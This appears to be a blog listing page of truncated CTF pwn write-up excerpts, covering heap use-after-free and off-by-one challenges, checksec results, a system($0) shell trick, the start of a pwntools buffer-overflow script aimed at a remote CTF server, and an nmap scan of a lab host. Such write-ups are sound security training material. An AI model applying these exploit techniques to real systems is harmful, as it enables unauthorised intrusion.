[HNCTF 2022 WEEK4]ezheap
[HNCTF 2022 WEEK4]ezheap [*] '/home/bamuwe/ezheap/ezheap' Arch: amd64-64-little RELRO: Full RELRO Stack: Canary found NX: NX enabled PIE: PIE enabled ...
[BUUCTF]hitcontraining_heapcreator UAF Off-By-One heap overflow; corresponding libc version libc6_2.23-0ubuntu9_amd64 [*] '/home/bamuwe/heapcreator/heapcreator' Arch: amd64-64-litt...
A so-called UAF (use-after-free) vulnerability means that a program, at runtime, accesses memory that has already been freed through a dangling pointer (a pointer that still points to an already-freed memory region). bamuwe@bamuwe:~/YDSneedGirlfriend$ ldd girlfriend linux-vdso.so.1 (0x00007ffd09fec000) /home/bamuwe/pwn_tools/glibc-all-in-o...
bamuwe@bamuwe:~/palu$ checksec Palu [*] '/home/bamuwe/palu/Palu' Arch: amd64-64-little RELRO: No RELRO Stack: Canary found NX: NX enabled PIE: No PIE (0x400...
[*] '/home/bamuwe/ez_uaf/ez_uaf' Arch: amd64-64-little RELRO: Full RELRO Stack: Canary found NX: NX enabled PIE: PIE enabled $ checksec ./ez_uaf Easy...
A special shell trick. It looks like a simple stack overflow, but the problem is that no usable /bin/sh or sh string can be found. A new shell trick appears here: system($0) can be used to obtain a shell. $0 is \x24\x30 in machine code, and the tips function happens to contain \x24\x30 that can be used to build it, so 0x400541 needs to be taken. On showing machine code in IDA: Option->general->Number ...
NSSCTF pwn practice notes page (1) [SWPUCTF 2021 Freshman Contest]gift_pwn from pwn import * io = remote('node4.anna.nssctf.cn',28991) padding = 16+8 shell = 0x4005B6 payload = b'A'*padding+p64(shell) io.sendline(payloa...
Host discovery 192.168.30.133 Information gathering └─$ nmap -sV -A 192.168.30.133 Starting Nmap 7.94 ( https://nmap.org ) at 2024-02-22 03:26 EST Nmap scan report for 192.168.30.133 Host is up (0.0013s latency). Not sho...
Canary protection; program control flow; 64-bit libc leak bamuwe@bamuwe:~/done/others_babystack$ checksec babystack [*] '/home/bamuwe/done/others_babystack/babystack' Arch: amd64-64-little RELRO: Full RELRO ...
bamuwe@bamuwe:~$ file quasar quasar: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=00a219f57c37379e9a7d16a82edc...